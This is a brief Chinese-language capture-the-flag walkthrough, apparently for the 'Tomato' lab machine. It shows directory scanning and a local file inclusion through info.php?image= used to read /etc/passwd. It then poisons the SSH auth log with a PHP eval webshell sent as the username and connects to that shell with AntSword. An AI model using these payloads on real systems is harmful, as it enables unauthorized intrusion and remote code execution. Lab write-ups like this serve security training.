步骤一,我们来到tomato页面
什么也弄不了只有一番茄图片
弱口令不行,xxs也不行,xxe还是不行
我们来使用kali来操作...
步骤二,使用dirb再扫一下, dirb http://172.16.1.133
1.发现这个文件可以访问.我们来访问一下
/antibot_image/
2.我们来看看他文件里面有什么东西是我们可以利用的!
3.找到网站绝对路径 info.php我们来点击进去
4.查看页面源代码 可以发现image的文件包含.
5.在info.php后面输入?image=/etc/passwd显示成功,说明存在文件包含漏洞
最下边
步骤三,将一句话木马作为ssh登录的用户名登录
1.输入
ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。
2.页面通过image传参查看日志文件
/var/log/auth.log
这个很阁僚...一开始有中间有下边还有,不过我问了一下说有就行了
发现多了一些报错信息,大概率写入木马成功.
步骤四,直接使用蚁剑进行连接:
http://172.16.1.113/antibot_image/antibots/info.php?image=/var/log/auth.log
密码:cmd
连接成功